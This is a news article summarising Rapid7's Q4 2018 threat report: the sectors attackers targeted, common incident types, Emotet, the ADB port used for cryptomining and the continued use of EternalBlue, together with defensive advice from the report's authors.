The accommodation sector saw a rise in attacks in the last quarter of 2018, according to a new report, which also noted the familiar pattern of high volumes of malicious activity targeting the Information, Professional, and Finance industries. The Accommodation industry is particularly attractive due to its access to financial data and PII.
Meanwhile, the most common threat event type in 2018 was remote entry, for both large and small organisations, as attackers transitioned from reconnaissance and independent credential harvesting to using those credentials. According to the quarterly report from Rapid7 (Q4 2018), the takeaway is that enterprises of all sizes are targets, whether for "actual data such as financial or health records, credential stores, or just plain CPU cycles and network bandwidth to be used for crypto mining or launching other attacks."
The report highlighted common attacker behaviours, finding that the most common group of incidents was suspicious authentication (43.8 percent) followed by indicators based on attackers (23.7 percent), PowerShell operations (12 percent) and suspicious processes (10.6 percent) - indicating lateral movement as the attackers move deeper into the network. Interestingly, the next most common incident was use of a trojan - at only 2.9 percent. "Regardless of the level of "artificial" intelligence that’s baked into any given security event information management (SIEM) system you may use, you will absolutely achieve better outcomes in detecting, deterring, and investigating incidents if you incorporate key learnings by your incredibly smart human responders into your processes", noted the report authors.
Bob Rudis, Rapid7's chief data scientist told SC Media that enterprises should focus on two specific challenges in 2019: "For the next couple of quarters organisations should continue to place an emphasis on detecting and neutralising Emotet as quickly as possible. I don't use this phrase much, but it's pretty scary just how quickly Emotet evolves/incorporates new tech and there are no real signs of it slowing down in 2019. Endpoint monitoring solutions should also be tuned to detecting malicious PowerShell usage as quickly as possible. If organisations have not invested in better endpoint defence solutions it would be wise to dedicate some 2019 budget and project time to doing so."
Overall, 2018 was a year marked by the emergence of organised, deliberate and intelligent attackers who were not only willing but able to invest in research, development, and diversification.
Another observation for 2018 was the rise and subsequent fall of the use of Port 5555/TCP - home of the ADB port - as the vector of choice for aspiring cryptominers looking to turn a profit off of illicit IPTV boxes and other Android devices with an open ADB port. However, the vector has seen a sharp drop off due to anti-piracy measures designed to combat the use of such devices: "That’s right, you can thank intellectual property lawyers for helping to stop cyber-crime…"
Somewhat depressingly, the use of EternalBlue remained high throughout 2018, indicating that in spite of enormous publicity via a string of high-profile global attacks, it is still an effective tool for hackers. "The code has been repurposed from freshman-level ransomware (WannaCry) to grad-school-level enterprise crippling attack kits (NotPetya), to MBA-level crypto mining (and everything in between). It’s truly the gift that keeps on giving", said the report, ruefully.